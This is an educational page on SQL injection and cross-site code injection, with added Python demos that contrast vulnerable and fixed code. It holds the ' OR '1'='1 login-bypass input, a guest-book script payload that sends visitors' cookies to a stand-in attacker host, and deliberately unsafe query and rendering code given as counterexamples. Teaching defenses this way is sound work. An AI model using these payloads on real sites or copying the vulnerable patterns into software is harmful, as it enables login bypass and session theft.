SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application.
It is insertion or “injection” of a SQL query via the input data from the client to the application.
“An attack technique used to exploit web sites by altering back-end SQL statements through manipulating application input.”
How does it happen?
For example, consider a web page that has two fields to allow users to enter:
1. User name
2. Password.
The code behind the page will generate a SQL query to check the password against the list of user names:
SELECT UserList.Username FROM UserList WHERE
UserList.Username = 'Username' AND
UserList.Password = 'Password'
If this query returns any rows, then access is granted.
However, if the malicious user enters a valid Username and injects some valid code (password' OR '1'='1) in the Password field, then the resulting query will look like this:
SELECT UserList.Username FROM UserList WHERE
UserList.Username = 'Username' AND UserList.Password = 'password' OR '1'='1'
In the example above, "Password" is assumed to be blank or some innocuous string. '1'='1' will always be true and many rows will be returned, thereby allowing access.
Causes of SQL Injection Vulnerability
SQL Injection happens when a developer accepts user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.
These vulnerabilities can occur whenever one programming or scripting language is embedded inside another.
How does the attacker work?
Attackers commonly insert single quotes (') into a URL's query string, or into a form's input field, to test for SQL Injection. If an attacker receives an error message like the one below, there is a good chance that the application is vulnerable to SQL Injection.
Error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or' /wasc.asp, line 69.
Effects of SQL Injection:
A successful SQL injection allows attackers to
– tamper with existing data
– read database data
– modify database data (Insert/Update/Delete)
– execute administration operations on the database (such as shutting down the DBMS)
– destroy the data or make it otherwise unavailable.
Where and why does it occur?
Where:- SQL Injection is very common in PHP and ASP applications.
Why:-
1. Due to the prevalence of older functional interfaces.
2. Due to the nature of programmatic interfaces available.
How to avoid it?
There are three complementary and successful methods of mitigating SQL Injection attacks:
1. Parameterized queries using bound, typed parameters.
2. Careful use of parameterized stored procedures.
3. Least privilege connections.
Parameterized queries are the easiest to adopt, and work in fairly similar ways among most web technologies in use today, including:
Java EE, .NET, PHP
Parameterized Queries with Bound Parameters
It keeps the query and data separate through the use of placeholders known as "bound" parameters. For example in Java, this looks like this:
"select * from table where column_a = ? and column_b = ?"
The developer must then set values for the two ? placeholders.
Note:-
Using this syntax without actually using the placeholders and setting values provides no protection against SQL injection.
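As an added illustration (not code from the original post), here is the page's UserList check written three ways in Python against an in-memory SQLite database: the concatenated query from the login example above, a version that merely looks parameterized because the values are formatted into the text before execution (the pitfall the note warns about), and one that binds the two values as parameters. The UserList table, the user alice and her password are constructed sample data; the injected password is the one from the page.

```python
import sqlite3

INJECTED_PASSWORD = "password' OR '1'='1"   # the page's example input


def make_db():
    # Constructed sample database mirroring the page's UserList table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserList (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO UserList VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # String concatenation, exactly the mistake the page describes:
    # the user's input becomes part of the SQL text itself.
    sql = ("SELECT UserList.Username FROM UserList WHERE "
           "UserList.Username = '" + username + "' AND "
           "UserList.Password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_fake_placeholders(conn, username, password):
    # Looks parameterized, but the '?' are replaced by the application before
    # the driver ever sees the query, so nothing is actually bound.
    template = ("SELECT UserList.Username FROM UserList WHERE "
                "UserList.Username = '?' AND UserList.Password = '?'")
    sql = template.replace("?", username, 1).replace("?", password, 1)
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    # Bound parameters: the query text is fixed and the driver passes the
    # values separately, so a quote in the input is just data to compare.
    sql = ("SELECT UserList.Username FROM UserList WHERE "
           "UserList.Username = ? AND UserList.Password = ?")
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo():
    # Returns whether each variant grants access for the given inputs.
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, "alice", INJECTED_PASSWORD),
        "fake_placeholders": login_fake_placeholders(conn, "alice", INJECTED_PASSWORD),
        "parameterized": login_parameterized(conn, "alice", INJECTED_PASSWORD),
        "parameterized_correct": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for name, granted in demo().items():
        print(f"{name}: access {'granted' if granted else 'denied'}")
```

Running the script shows the first two variants granting access with the injected password, because the resulting statement is the `... OR '1'='1'` query from the example; only the bound-parameter version rejects it while still accepting the real password.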
Parameterized Stored Procedures:
It is an effective mechanism to avoid most forms of SQL Injection.
In combination with parameterized bound queries, it is very unlikely that SQL injection will occur within your application.
Dynamic code execution features can still allow SQL Injection. The following procedure concatenates its @userName argument into a string and then executes that string, so the parameter provides no protection:
create proc DynamicSQL(@userName nvarchar(25)) as
declare @sql nvarchar(255)
set @sql = 'select * from users where UserName = ''' + @userName + ''''
exec sp_executesql @sql
Least privilege connections:
Always use accounts with the minimum privilege necessary for the application at hand; never use names such as "sa", "dba", "admin", or the equivalent.
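Added example, not from the original post: SQLite has no user accounts, so this Python script stands in for a minimally privileged database account by installing an authorizer on the application's connection that permits only SELECT and column reads from UserList. Valid UPDATE, DELETE and DROP statements are then refused at compile time, which is what a least-privilege connection buys you if an injection does slip through. The UserList table and its row are constructed sample data.

```python
import sqlite3


def make_db():
    # Constructed sample schema mirroring the page's UserList table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserList (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO UserList VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def read_only_userlist(action, arg1, arg2, db_name, source):
    # Authorizer callback: SQLite invokes it for every operation while a
    # statement is compiled. Only SELECT and reads of UserList columns pass;
    # everything else (UPDATE, DELETE, DROP, CREATE, PRAGMA, ...) is denied.
    if action == sqlite3.SQLITE_SELECT:
        return sqlite3.SQLITE_OK
    if action == sqlite3.SQLITE_READ and arg1 == "UserList":
        return sqlite3.SQLITE_OK
    return sqlite3.SQLITE_DENY


def restrict_connection(conn):
    # The application code only ever gets this restricted handle.
    conn.set_authorizer(read_only_userlist)
    return conn


def try_statement(conn, sql, params=()):
    """Return True if the restricted connection was allowed to run sql."""
    try:
        conn.execute(sql, params)
        return True
    except sqlite3.Error:   # "not authorized" surfaces as a DatabaseError
        return False


def demo():
    # Which statements the least-privilege connection will run.
    conn = restrict_connection(make_db())
    return {
        "select": try_statement(
            conn, "SELECT Username FROM UserList WHERE Username = ?", ("alice",)),
        "update": try_statement(conn, "UPDATE UserList SET Password = 'x'"),
        "delete": try_statement(conn, "DELETE FROM UserList"),
        "drop": try_statement(conn, "DROP TABLE UserList"),
    }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: {'allowed' if allowed else 'denied'}")
```

The schema is created before the authorizer is installed, mirroring the usual split between a migration account and the application account; with a real DBMS the same effect comes from granting the application login SELECT on the tables it needs and nothing more.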
What is Code injection?
Code injection is the exploitation of a computer bug that is caused by processing invalid data.
Code injection can be used by an attacker to introduce (or “inject”) code into a computer program to change the course of execution.
Example
A web server has a “Guest book” script, which accepts small messages from users, and typically receives messages such as
Very Nice site!
However, a malicious person may know of a code injection vulnerability in the "Guest book", and enters a message such as
Nice Site, I think I'll take it.<script>document.location='http://some_attacker/cookie.cgi?' +document.cookie</script>
If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display malformed HTML.
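Added example (not from the original page): the guest-book rendering in Python, once with each message concatenated raw into the HTML, as the vulnerable script above does, and once with html.escape applied so that the stored script element is shown to visitors as text rather than executed. The message list, including the page's injected entry, is constructed sample data.

```python
import html

# Constructed guest-book messages: the harmless one from the page and the
# injected one.
MESSAGES = [
    "Very Nice site!",
    "Nice Site, I think I'll take it.<script>document.location="
    "'http://some_attacker/cookie.cgi?' +document.cookie</script>",
]


def render_unsafe(messages):
    # Raw user input becomes part of the HTML, so the browser parses the
    # stored <script> element and runs it for every visitor.
    return "<ul>" + "".join(f"<li>{m}</li>" for m in messages) + "</ul>"


def render_safe(messages):
    # Output encoding: <, >, &, and quotes become character references, so
    # markup characters in a message are displayed literally, never parsed.
    return "<ul>" + "".join(
        f"<li>{html.escape(m, quote=True)}</li>" for m in messages) + "</ul>"


def contains_script_element(page):
    # Simple check a test can use: does the rendered page contain a real
    # script tag (as opposed to the escaped text &lt;script&gt;)?
    return "<script" in page.lower()


if __name__ == "__main__":
    print("unsafe has script element:", contains_script_element(render_unsafe(MESSAGES)))
    print("safe has script element:  ", contains_script_element(render_safe(MESSAGES)))
```

Escaping at output time, rather than trying to strip "bad" characters on input, is the standard fix for this class of bug because it keeps the stored message intact while guaranteeing it can only ever be rendered as text.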
Security vulnerabilities
The term vulnerability is applied to a weakness in a system which allows an attacker to violate the integrity of that system.
Vulnerabilities may result from:
– weak passwords.
– software bugs.
– computer viruses.
– script code injection and SQL injection.
Causes of SQL injection
Password Management Flaws:
– Users choose weak passwords that could be discovered.
– Users store the password on the computer where a program can access it.
– Users re-use passwords between many programs and websites.
Fundamental Application Design Flaws – the application designer chooses to enforce suboptimal policies on user/program management.
For example, "default permit" grants every program and every user full access to the entire computer. This operating system flaw allows viruses to execute commands on behalf of the administrator.
Software Bugs
– Sometimes a programmer leaves an exploitable bug in a software program. Such software bugs may allow an attacker to misuse an application through "Unchecked User Input".
The program assumes that all user input is safe. Programs that do not check user input can allow unintended direct execution of commands or SQL statements (leading to vulnerabilities such as buffer overflows and SQL injection).
Examples of vulnerabilities
Common types of vulnerabilities
Memory safety violations, such as:
– Buffer overflows
– Dangling pointers
Input validation errors, such as:
– Format string bugs
– Improperly handling shell metacharacters so they are interpreted
– SQL injection
– Code injection
– E-mail injection
– Directory traversal
– Cross-site scripting in web applications
– HTTP header injection
– HTTP response splitting
Race conditions, such as:
– Time-of-check-to-time-of-use bugs
– Symlink races